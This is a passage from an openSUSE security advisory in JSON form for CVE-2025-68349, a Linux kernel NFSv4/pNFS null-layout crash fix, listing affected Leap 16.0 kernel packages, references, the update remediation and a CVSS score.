"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFSv4/pNFS: Clear NFS_INO_LAYOUTCOMMIT in pnfs_mark_layout_stateid_invalid\n\nFixes a crash when layout is null during this call stack:\n\nwrite_inode\n -\u003e nfs4_write_inode\n -\u003e pnfs_layoutcommit_inode\n\npnfs_set_layoutcommit relies on the lseg refcount to keep the layout\naround. Need to clear NFS_INO_LAYOUTCOMMIT otherwise we might attempt\nto reference a null layout.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68349",
"url": "https://www.suse.com/security/cve/CVE-2025-68349"
},
{
"category": "external",
"summary": "SUSE Bug 1255544 for CVE-2025-68349",
"url": "https://bugzilla.suse.com/1255544"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
